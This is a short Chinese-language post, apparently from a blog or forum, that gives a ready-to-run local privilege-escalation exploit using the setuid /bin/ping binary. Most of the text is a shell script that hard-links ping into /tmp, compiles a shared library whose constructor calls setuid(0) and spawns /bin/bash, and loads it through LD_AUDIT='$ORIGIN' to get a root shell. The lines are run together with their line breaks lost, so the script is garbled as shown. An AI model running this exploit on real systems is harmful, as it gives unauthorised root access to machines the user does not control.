1、利用/bin/ping的漏洞普通用户提权。(rws中的s)
[root@localhost ~]# ls -l /bin/ping-rwsr-xr-x. 1 root root 40760 9月 26 /bin/ping
2、执行以下代码即可:
#!/bin/shunset LD_AUDITrm -r -f /tmp/exploitmkdir /tmp/exploitln /bin/ping /tmp/exploit/targetexec 3< /tmp/exploit/targetls -l /proc/$$/fd/3rm -rf /tmp/exploitls -l /proc/$$/fd/3cat > program.c << _EOFvoid __attribute__((constructor)) init(){setuid(0);system("/bin/bash");}_EOFgcc -w -fPIC -shared -o /tmp/exploit program.cLD_AUDIT="\$ORIGIN" exec /proc/self/fd/3unset LD_AUDIT